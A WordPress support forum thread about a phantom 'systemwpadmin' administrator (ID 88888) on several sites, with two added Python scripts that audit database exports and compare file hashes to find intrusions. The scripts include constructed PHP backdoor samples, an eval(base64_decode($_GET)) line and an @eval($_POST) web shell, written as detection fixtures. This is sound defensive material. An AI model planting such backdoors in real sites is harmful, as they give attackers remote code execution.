
Unknown user "systemwpadmin" (17 posts)

  1. cgw
    Member
    Posted 2 years ago #

    I have an up-to-date installation, having rebuilt it from scratch after a hack last May on a new server and IP, and adding several security plug-ins based on recommendations in the forum and documentation: the site is pretty well locked down.

    Simple login log has recorded a number of unsuccessful brute force attempts to login as "admin" but it also records a successful log-in by "systemwpadmin" with id 88888 and a Russian IP. I can't tell whether the access was at admin level or not, and have spent hours looking for any clues as to what may have been changed: core files and template (artisteer) seem fine and there seems no trace otherwise of a hack. The database doesn't seem to have any base64_, eval or strrev strings anywhere but I would like to know if there is a good method to scan the database for hacking attempts.

    A google search indicates the same username has apparently attacked other sites but there is no follow-up information.

    I would welcome any suggestions as to what may have been tampered with, or how best to proceed as I am somewhat frustrated and disheartened.

    Many thanks in anticipation.

    ps. I can't really add htaccess to wp-admin as I will need to give access to several authors/editors

  2. Krishna
    Volunteer Moderator
    Posted 2 years ago #

    Perhaps you need to go through: codex.wordpress.org/Hardening_WordPress

  3. cgw
    Member
    Posted 2 years ago #

    'fraid I've already been there, and done it all after the hack two months ago.

    What I'm seeking is suggestions on how to find out if the site is now compromised, and how to track down what the vulnerability was likely to be.

    Suggestions as to how to proceed please!

  4. Krishna
    Volunteer Moderator
    Posted 2 years ago #

    Here is one of the tools you can use: http://sitecheck.sucuri.net/scanner/
    If you have an account with Google Webmaster tools, make it a habit to check if Google reports malware (see this).

    There are several other tools to check hacking, malware, etc.

  5. cgw
    Member
    Posted 2 years ago #

    Thanks.

    Sucuri and several other scanners show nothing but I have found a hidden post with author id of 88888 in the database which disappeared as soon as I tried to investigate. I also managed to confirm that the log-in was at administrator level. Very worrying that they were able to log straight in without any failed attempts.

    Another recent report I found using the same user name managed to delete template files, so I have to assume as I have a pretty hardened installation that there is a weakness somewhere either in the core or a plugin (which include several security ones!)

    I'll leave everything alone for a few days to see if there are any other reports that might throw any more light on what's happening. There's certainly no point rebuilding or continuing with the website without having some clue how to stop it happening again.

    Many thanks for your suggestions. Even if we can't solve it now, this thread might help someone else in the future.
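An added example, not code from this thread, for the two database questions raised above: post 1 asks how to scan the database for base64_/eval/strrev strings, and post 5 finds a hidden post with author ID 88888 and an administrator-level login. It assumes the wp_users, wp_usermeta, wp_posts and wp_options tables have been exported (phpMyAdmin, mysqldump) and loaded into the lists of dicts below; every row here is constructed for the demo, with the 88888 ID from the thread as the planted anomaly, and the table prefix is assumed to be the default wp_.

```python
"""Offline audit of exported WordPress tables for a phantom administrator."""
import re

TABLE_PREFIX = "wp_"   # assumption: default prefix; check $table_prefix in wp-config.php

# Constructed sample rows standing in for a real export.
WP_USERS = [
    {"ID": 1, "user_login": "cgw"},
    {"ID": 2, "user_login": "editor1"},
]
WP_USERMETA = [
    {"user_id": 1, "meta_key": "wp_capabilities",
     "meta_value": 'a:1:{s:13:"administrator";b:1;}'},
    {"user_id": 2, "meta_key": "wp_capabilities",
     "meta_value": 'a:1:{s:6:"editor";b:1;}'},
    # A raw `DELETE FROM wp_users` leaves the user's meta behind, unlike
    # wp_delete_user(); an orphaned administrator capability row is the trace.
    {"user_id": 88888, "meta_key": "wp_capabilities",
     "meta_value": 'a:1:{s:13:"administrator";b:1;}'},
]
WP_POSTS = [
    {"ID": 40, "post_author": 1, "post_status": "publish", "post_content": "Hello world"},
    {"ID": 41, "post_author": 88888, "post_status": "draft",   # constructed payload
     "post_content": '<?php eval(base64_decode("cGhwaW5mbygpOw==")); ?>'},
]
WP_OPTIONS = [
    {"option_name": "siteurl", "option_value": "http://example.invalid"},
    {"option_name": "active_plugins",
     "option_value": 'a:1:{i:0;s:19:"akismet/akismet.php";}'},
]

# Functions PHP malware uses to hide its payload; matched only when called.
OBFUSCATION = [
    ("base64_decode", re.compile(r"\bbase64_decode\s*\(")),
    ("eval", re.compile(r"\beval\s*\(")),
    ("gzinflate", re.compile(r"\bgzinflate\s*\(")),
    ("str_rot13", re.compile(r"\bstr_rot13\s*\(")),
    ("strrev", re.compile(r"\bstrrev\s*\(")),
]
# Serialized PHP array entry for the administrator role (13 = len("administrator")).
ADMIN_CAP = re.compile(r's:13:"administrator";b:1;')


def admin_user_ids(usermeta, prefix=TABLE_PREFIX):
    """User IDs holding the administrator role, whether or not wp_users still has them."""
    key = prefix + "capabilities"
    return {m["user_id"] for m in usermeta
            if m["meta_key"] == key and ADMIN_CAP.search(m["meta_value"])}


def orphaned_usermeta(users, usermeta):
    """Meta rows whose user row no longer exists.  SQL equivalent:
    SELECT m.* FROM wp_usermeta m LEFT JOIN wp_users u ON u.ID = m.user_id
    WHERE u.ID IS NULL;"""
    ids = {u["ID"] for u in users}
    return [m for m in usermeta if m["user_id"] not in ids]


def orphaned_posts(users, posts):
    """Posts attributed to a user ID that is not in wp_users (the hidden post)."""
    ids = {u["ID"] for u in users}
    return [p for p in posts if p["post_author"] not in ids]


def id_outliers(ids, gap=1000):
    """IDs that jump far past the previous one: AUTO_INCREMENT never skips that
    far on its own, so a row like 88888 was inserted with an explicit ID."""
    ordered = sorted(ids)
    return [b for a, b in zip(ordered, ordered[1:]) if b - a > gap]


def scan_obfuscation(rows, field, key):
    """(row key, pattern name) for every obfuscation call found in one column."""
    return [(row[key], name) for row in rows
            for name, rx in OBFUSCATION if rx.search(row[field])]


def audit(users=WP_USERS, usermeta=WP_USERMETA, posts=WP_POSTS, options=WP_OPTIONS):
    """Run every check and return the findings as plain lists."""
    known = {u["ID"] for u in users}
    seen_ids = known | {m["user_id"] for m in usermeta} | {p["post_author"] for p in posts}
    return {
        "admins_without_user_row": sorted(admin_user_ids(usermeta) - known),
        "orphaned_usermeta": [m["user_id"] for m in orphaned_usermeta(users, usermeta)],
        "orphaned_posts": [p["ID"] for p in orphaned_posts(users, posts)],
        "id_outliers": id_outliers(seen_ids),
        "obfuscated_posts": scan_obfuscation(posts, "post_content", "ID"),
        "obfuscated_options": scan_obfuscation(options, "option_value", "option_name"),
    }


if __name__ == "__main__":
    for finding, value in audit().items():
        print(f"{finding}: {value}")
```

The orphan checks are the ones worth running first: a user that was created, used and then deleted through a raw query leaves its wp_usermeta row behind, and a post it authored keeps the dead author ID, so both survive even after the wp_users row is gone. A real export will also have more meta keys per user and a non-default prefix, which is why the prefix is a parameter.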

  6. mvandemar
    Member
    Posted 2 years ago #

    @cgw - I am cleaning a site now that has the same issues, and the malicious admin was, I am sure, added back when the site was originally hacked. If you like I would be happy to scan the site for you and see what, if anything, was missed in either the files or the database. Feel free to hit me up at michael at endless poetry dot com (no spaces).

  7. jehzlau
    Member
    Posted 1 year ago #

    This is creepy. I also noticed that a systemwpadmin user was created in my freshly installed wordpress blog. >__<.

    I just reinstalled it again and changed all my passwords again and my e-mail and after a few months, the systemwpadmin was created again. But nothing was hacked. My themes weren't modified, and my database was clean.

  8. cgw
    Member
    Posted 1 year ago #

    And even more creepy - my site has just been accessed by systemwpadmin just one hour ago with user id 88888. I haven't had time to investigate yet.

    Need to check database - last time this happened I think I found systemwpadmin as a user. Will try to take a look later today.

    As you have a clean install, did you have any plug-ins running? I originally wondered if it was one of my plug-ins that had a vulnerability. The theme I'm using was created with Artisteer.

  9. mow_bell
    Member
    Posted 1 year ago #

    My case:
    I found users with id > 88888

    Any news?

  10. itpixie
    Member
    Posted 1 year ago #

    I've been researching this issue as well, and have been posting some stuff on this other thread:
    http://wordpress.org/support/topic/unknown-logged-in-successfully-as-systemwpadmin

    The current theory is that the attacker is able to remotely create an admin level user, logs into the site, does his thing (in my case, tried changing some files via the theme editor), then logs out and deletes himself from the database.

    I have not completely figured out how that was being done. Someone suggested that script injections via outdated Timthumb allowed some kind of user creation script to be added to the site. So you might want to scan your site for any file changes, if you haven't done that already. Wordfence does a good job pointing out discrepancies between your files versus WP's original distribution. Check your theme's functions.php for suspicious stuff too.

    A few other things I did seem to help keep the phantom user at bay:

    1. updated the salt values in wp-config.php
    2. updated my WP database password
    3. got rid of any unused themes and plugins -- I suspect some kind of user creation script might have been added there in my case
    4. I use Wordfence to get alerted when admin level users login so I can better monitor who's accessing the site.
    5. Ultimate Security Checker scans for malicious stuff in post and comments too, if you need a scanner for that.

    Will update if I find additional information.
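An added example, not code from this thread or from Wordfence, of the file-change check recommended in the post above (comparing the live site against a known-good copy, then looking at functions.php and any other recently changed PHP). It assumes you have a clean copy of the same WordPress, theme and plugin versions to hash as a baseline (a fresh download or the last clean backup). The two small trees, the backdoor snippet and the stray file name wp-functions.php are all constructed in a temporary directory so the script runs offline; none of them are files from anyone's real site.

```python
"""Hash-diff a WordPress tree against a clean copy and list what changed."""
import hashlib
import os
import pathlib
import tempfile
import time

CLEAN_FUNCTIONS = "<?php\nadd_theme_support('post-thumbnails');\n"
# Constructed backdoor appended to functions.php: runs whatever the query string carries.
BACKDOORED_FUNCTIONS = CLEAN_FUNCTIONS + \
    "if (isset($_GET['x'])) { eval(base64_decode($_GET['x'])); }\n"
# Constructed one-line web shell dropped under the document root.
WEBSHELL = "<?php @eval($_POST['c']); ?>\n"


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """relative path -> sha256 for every file under root (run on the clean copy)."""
    root = pathlib.Path(root)
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in root.rglob("*") if p.is_file()}


def diff_against_manifest(root, manifest):
    """Files added, missing or changed on the live site relative to the manifest."""
    live = build_manifest(root)
    common = set(live) & set(manifest)
    return {
        "added": sorted(set(live) - set(manifest)),
        "missing": sorted(set(manifest) - set(live)),
        "modified": sorted(p for p in common if live[p] != manifest[p]),
    }


def newest_files(root, n=5):
    """The n most recently modified files, as a quick first look.  mtime can be
    reset with touch, so the hash diff above is the authoritative check."""
    root = pathlib.Path(root)
    files = [p for p in root.rglob("*") if p.is_file()]
    files.sort(key=lambda p: p.stat().st_mtime, reverse=True)
    return [p.relative_to(root).as_posix() for p in files[:n]]


def make_sample_tree():
    """Constructed clean and live trees; returns (clean_dir, live_dir)."""
    base = pathlib.Path(tempfile.mkdtemp(prefix="wp-audit-"))
    clean, live = base / "clean", base / "live"
    for root in (clean, live):
        (root / "wp-content" / "themes" / "mytheme").mkdir(parents=True)
        (root / "index.php").write_text("<?php require 'wp-blog-header.php';\n")
    theme_fn = "wp-content/themes/mytheme/functions.php"
    (clean / theme_fn).write_text(CLEAN_FUNCTIONS)
    (live / theme_fn).write_text(BACKDOORED_FUNCTIONS)
    (live / "wp-functions.php").write_text(WEBSHELL)   # name constructed for the demo
    # Backdate the live files so the "newest first" listing is deterministic.
    now, day = time.time(), 86400
    os.utime(live / "index.php", (now - 400 * day, now - 400 * day))
    os.utime(live / theme_fn, (now - 30 * day, now - 30 * day))
    os.utime(live / "wp-functions.php", (now - 2 * day, now - 2 * day))
    return str(clean), str(live)


if __name__ == "__main__":
    clean_dir, live_dir = make_sample_tree()
    print(diff_against_manifest(live_dir, build_manifest(clean_dir)))
    print(newest_files(live_dir, 3))
```

On a real site, take the manifest from the clean copy once and keep it off the server; if the attacker can write to the web root they can also rewrite a manifest stored there. Anything in "added" under the document root or a theme directory, and any "modified" core file, is worth opening before anything else.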

  11. cgw
    Member
    Posted 1 year ago #

    To mow_bell and itpixie

    Thanks for your posts. Yes, my mystery user had id of 88888. Need to look at itpixie's thoughts about Timthumb but don't think it applies to my site (but will double check). This definitely needs to be sorted!

    Could you please both confirm whether or not you use Artisteer as I would like to eliminate that so we can concentrate on the core which is where I think the problem lies. It would also be good to know which host you use in case that is a common factor.

  12. cgw
    Member
    Posted 1 year ago #

    ... and just checked with Timthumb does not exist on my server

  13. itpixie
    Member
    Posted 1 year ago #

    @cgw -- thanks for the additional info here and on the other thread. I have added some update over at the other thread.

    To answer your questions, my site-in-question is on GoDaddy and no, it doesn't use Artisteer.

    Other than TimThumb, there are other "upload" scripts that can be dangerous, especially if they are outdated. Uploadify is another one you should check your themes/plugins for.

    wpsecure.net keeps database of vulnerable WP themes and plugins, you might want to cross-reference your stuff with that list.

  14. mow_bell
    Member
    Posted 1 year ago #

    @cgw and itpixie, thanks for your replies
    My site is on GoDaddy too, I do not use Artisteer, nor Uploadify, nor plugin related to upload files.

    I use Timthumb Scanner "No instances of timthumb were found on your server."

    My themes are custom html, without using templates, functions or template tags, absolutely nothing related to traditional themes.

    I use wordpress for backend, with multisite installation, with nofollow meta on header, all sites require login and are private sites, and I use these plugins:

    Adminimize
    Members
    Ultimate Taxonomy Manager
    Revision Control
    JSON API
    Email Login

  15. Rick van Koert
    Member
    Posted 1 year ago #

    Godaddy user here too.

    Found a file floating suddenly under WP root that was modified 2 days ago. My backup doesn't show the file, so I yanked it and WP still works. Got worried and found the same guy as admin "systemwpadmin" with id 88888.

    No idea what to do next. Think I'll just kill WP off my site, forget all about it and move back to my IPB forum.

    File modified was wp-functions, located under the wordpress root folder.

  16. Andrew
    Forum Moderator
    Posted 1 year ago #

    Rick van Koert,
    For support on your own issue, create your own thread.

  17. cgw
    Member
    Posted 1 year ago #

    Rick,

    Many thanks for your info - very much appreciated. Yes, like you, I find this problem very disheartening but I am hoping that with enough information, we will discover where the vulnerability lies. I'll check my own site for wp-functions.
